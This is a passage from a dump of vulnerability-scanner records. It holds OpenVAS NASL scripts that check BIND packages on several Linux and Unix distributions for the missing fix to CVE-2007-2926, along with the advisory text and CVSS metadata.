ishpuxpkgvuln(pkg:\"BINDv920.INETSVCS-BIND\", revision:\"D920\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"BindUpgrade.BIND-UPGRADE\", revision:\"C.9.3.2.2.0\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-24T12:50:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2926"], "description": "The remote host is missing an update to bind9\nannounced via advisory DSA 1342-2.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:58513", "href": "http://plugins.openvas.org/nasl.php?oid=58513", "type": "openvas", "title": "Debian Security Advisory DSA 1342-2 (bind9)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1342_2.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1342-2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"This update provides fixed packages for the oldstable distribution (sarge).\nFor reference the original advisory text:\n\nAmit Klein discovered that the BIND name server generates predictable\nDNS query IDs, which may lead to cache poisoning attacks.\n\nFor the oldstable distribution (sarge) this problem has been fixed in\nversion 9.2.4-1sarge3. An update for mips, powerpc and hppa is not yet\navailable, they will be released soon.\n\nFor the stable distribution (etch) this problem has been fixed in\nversion 9.3.4-2etch1. An update for mips is not yet available, it will\nbe released soon.\n\nFor the unstable distribution (sid) this problem will be fixed soon.\n\nWe recommend that you upgrade your BIND packages.\";\ntag_summary = \"The remote host is missing an update to bind9\nannounced via advisory DSA 1342-2.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201342-2\";\n\nif(description)\n{\n script_id(58513);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:19:52 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2007-2926\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"Debian Security Advisory DSA 1342-2 (bind9)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"bind9-doc\", ver:\"9.2.4-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9\", ver:\"9.2.4-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9-host\", ver:\"9.2.4-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dnsutils\", ver:\"9.2.4-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbind-dev\", ver:\"9.2.4-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdns16\", ver:\"9.2.4-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisc7\", ver:\"9.2.4-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisccc0\", ver:\"9.2.4-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisccfg0\", ver:\"9.2.4-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblwres1\", ver:\"9.2.4-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lwresd\", ver:\"9.2.4-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9-doc\", ver:\"9.3.4-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9\", ver:\"9.3.4-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"bind9-host\", ver:\"9.3.4-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dnsutils\", ver:\"9.3.4-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbind-dev\", ver:\"9.3.4-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libbind9-0\", ver:\"9.3.4-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdns22\", ver:\"9.3.4-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisc11\", ver:\"9.3.4-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisccc0\", ver:\"9.3.4-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libisccfg1\", ver:\"9.3.4-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"liblwres9\", ver:\"9.3.4-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"lwresd\", ver:\"9.3.4-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-04-06T11:39:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2926"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n bind-utils\n bind-devel\n bind\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5015954 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065424", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065424", "type": "openvas", "title": "SLES9: Security update for bind,bind-devel,bind-utils", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5015954.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for bind,bind-devel,bind-utils\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n bind-utils\n bind-devel\n bind\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5015954 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65424\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2007-2926\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"SLES9: Security update for bind,bind-devel,bind-utils\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.2.3~76.34\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-12-12T11:19:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2926"], "description": "Check for the Version of bind, bind9", "modified": "2017-12-08T00:00:00", "published": "2009-01-28T00:00:00", "id": "OPENVAS:850109", "href": "http://plugins.openvas.org/nasl.php?oid=850109", "type": "openvas", "title": "SuSE Update for bind, bind9 SUSE-SA:2007:047", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2007_047.nasl 8050 2017-12-08 09:34:29Z santu $\n#\n# SuSE Update for bind, bind9 SUSE-SA:2007:047\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"DNS cache poisoning\";\ntag_affected = \"bind, bind9 on SUSE LINUX 10.1, openSUSE 10.2, SuSE Linux Enterprise Server 8, SUSE SLES 9, Novell Linux Desktop 9, Open Enterprise Server, Novell Linux POS 9, SUSE Linux Enterprise Desktop 10 SP1, SLE SDK 10 SP1, SUSE Linux Enterprise Server 10 SP1\";\ntag_insight = \"Amit Klein found that the random number generator used by the BIND\n name server to compute DNS query IDs generates predictable values.\n Remote attackers could exploit this flaw to conduct DNS cache\n poisoning attacks CVE-2007-2926.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850109);\n script_version(\"$Revision: 8050 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 10:34:29 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-28 13:40:10 +0100 (Wed, 28 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"SUSE-SA\", value: \"2007-047\");\n script_cve_id(\"CVE-2007-2926\");\n script_name( \"SuSE Update for bind, bind9 SUSE-SA:2007:047\");\n\n script_summary(\"Check for the Version of bind, bind9\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE10.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.2~56.3\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.2~56.3\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.2~56.3\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs-32bit\", rpm:\"bind-libs-32bit~9.3.2~56.3\", rls:\"openSUSE10.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLESSr8\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind9\", rpm:\"bind9~9.2.2~105\", rls:\"SLESSr8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind9-devel\", rpm:\"bind9-devel~9.2.2~105\", rls:\"SLESSr8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind9-utils\", rpm:\"bind9-utils~9.2.2~105\", rls:\"SLESSr8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLESDK10SP1\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.4~1.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.4~1.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs-32bit\", rpm:\"bind-libs-32bit~9.3.4~1.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.4~1.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.4~1.16\", rls:\"SLESDK10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"OES\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.2.3~76.34\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.2.3~76.34\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.2.3~76.34\", rls:\"OES\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLES9\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.2.3~76.34\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.2.3~76.34\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.2.3~76.34\", rls:\"SLES9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"LES10SP1\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.4~1.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.4~1.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs-32bit\", rpm:\"bind-libs-32bit~9.3.4~1.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.4~1.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.4~1.16\", rls:\"LES10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"NLDk9\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.2.3~76.34\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.2.3~76.34\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.2.3~76.34\", rls:\"NLDk9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SLESDk10SP1\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.4~1.16\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.4~1.16\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs-32bit\", rpm:\"bind-libs-32bit~9.3.4~1.16\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.4~1.16\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.4~1.16\", rls:\"SLESDk10SP1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"SL10.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.2~17.18\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.2~17.18\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.2~17.18\", rls:\"SL10.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"NLPOS9\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.2.3~76.34\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.2.3~76.34\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.2.3~76.34\", rls:\"NLPOS9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:36:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2926"], "description": "Oracle Linux Local Security Checks ELSA-2007-0740", "modified": "2018-09-28T00:00:00", "published": "2015-10-08T00:00:00", "id": "OPENVAS:1361412562310122672", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122672", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2007-0740", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2007-0740.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122672\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-08 14:50:48 +0300 (Thu, 08 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2007-0740\");\n script_tag(name:\"insight\", value:\"ELSA-2007-0740 - Moderate: bind security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2007-0740\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2007-0740.html\");\n script_cve_id(\"CVE-2007-2926\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.3~9.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.3~9.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.3~9.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.3~9.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.3~9.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.3~9.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.3~9.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.3~9.0.1.el5\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-12-08T11:44:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2926"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory FreeBSD-SA-07:07.bind.asc", "modified": "2017-12-07T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:58512", "href": "http://plugins.openvas.org/nasl.php?oid=58512", "type": "openvas", "title": "FreeBSD Security Advisory (FreeBSD-SA-07:07.bind.asc)", "sourceData": "#\n#ADV FreeBSD-SA-07:07.bind.asc\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n#\n\ntag_insight = \"BIND 9 is an implementation of the Domain Name System (DNS) protocols.\nThe named(8) daemon is an Internet Domain Name Server. DNS requests\ncontain a query id which is used match a DNS request with the response\nand to make it harder for anybody but the DNS server which received the\nrequest to send a valid response.\n\nWhen named(8) is operating as a recursive DNS server or sending NOTIFY\nrequests to slave DNS servers, named(8) uses a predictable query id.\";\ntag_solution = \"Upgrade your system to the appropriate stable release\nor security branch dated after the correction date\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FreeBSD-SA-07:07.bind.asc\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory FreeBSD-SA-07:07.bind.asc\";\n\n \nif(description)\n{\n script_id(58512);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) 